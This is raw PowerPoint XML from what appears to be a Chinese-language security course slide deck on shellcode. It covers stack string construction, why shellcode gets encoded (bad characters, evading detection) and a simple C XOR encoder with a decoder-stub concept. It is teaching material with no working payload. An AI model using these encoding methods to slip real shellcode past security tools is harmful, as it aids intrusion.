              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>入栈的话，需要倒着来；考虑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bigendian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>编码，存储顺序也得倒过来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用寄存器？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>, 0x726C6400; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275277102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532831" y="3108493"/>
            <a:ext cx="10729192" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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知识点五：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1"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Shellcode</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编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156299739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27821" y="1343549"/>
            <a:ext cx="10747122" cy="4453736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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代码编制过程通常需要进行编码，因为：</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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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字符集的差异。</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应用程序应用平台的不同，可能的字符集会有差异，限制</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exploit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的稳定性。</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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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绕过坏字符。</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针对某个应用，可能对某些“坏字符”变形或者截断而破坏</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exploit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，比如</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strcpy</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函数对</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NULL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字符的不可接纳性，再比如很多应用在某些处理流程中可能会限制</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0x0D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0x0A</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）或者</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0x20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（空格）字符。</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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>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绕过安全防护检测。</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有很多安全检测工具是根据漏洞相应的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exploit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脚本特征做的检测，所以变形</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exploit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在一定程度上可以“免杀”。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5435940" y="837929"/>
              <a:ext cx="1986870" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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编码必要性</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399959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27821" y="1240061"/>
            <a:ext cx="10747122" cy="5073200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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网页</a:t>
            </a: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对于网页</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，可以采用</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base64</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编码</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Base64</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是网络上最常见的用于传输</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8Bit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字节码的编码方式之一，是一种基于</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64</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个可打印字符来表示二进制数据的方法。</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二进制机器代码</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。对于二进制</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机器代码的编码，通常采用类似“加壳”思想的手段，采用：</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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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自定义编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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异或编码、计算编码、简单加解密等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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的方法完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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的编码；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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通过精心构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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精简干练的解码程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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，放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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开始执行的地方，完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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的编解码</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当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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成功时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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顶端的解码程序首先运行，它会在内存中将真正的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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还原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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rPr>
              <a:t>成原来的样子，然后执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5540101" y="837929"/>
              <a:ext cx="1778548" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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编码方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71384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
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35">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5">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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00783" y="1168053"/>
            <a:ext cx="10747122" cy="1527614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="13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异或编码是一种简单易用的</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编码方法，它的编解码程序非常简单。</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3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但是，它也存在很多限制，比如在选取编码字节时，不可与已有字节相同，否则会出现</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solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5950234" y="837929"/>
              <a:ext cx="958281"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异或编码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="672362931"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5638221" y="2464197"/>
          <a:ext cx="6552728" cy="4284850"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6552728">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4284850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>void encoder(char* input, unsigned char key)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = 0, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>len</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = 0;     </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>len</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>strlen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(input);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    unsigned char * output =  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(unsigned char *)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>malloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>len</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> + 1);    	</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    for (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = 0; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>len</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>++)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> output[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>] = input[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>] ^ key; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    ……</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>输出到文件中</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>….</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t> main(){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>    char </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>[]=“0xAE………………………0x90”;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>    encoder(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>sc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>, 0x44);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="3112269"/>
            <a:ext cx="3888432" cy="2308324"/>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编码程序，是独立的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">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是在生成</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的编码阶段使用。将</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代码输入后，输出异或后的</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编码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="957345869"/>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00783" y="1096045"/>
            <a:ext cx="10747122" cy="1527614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
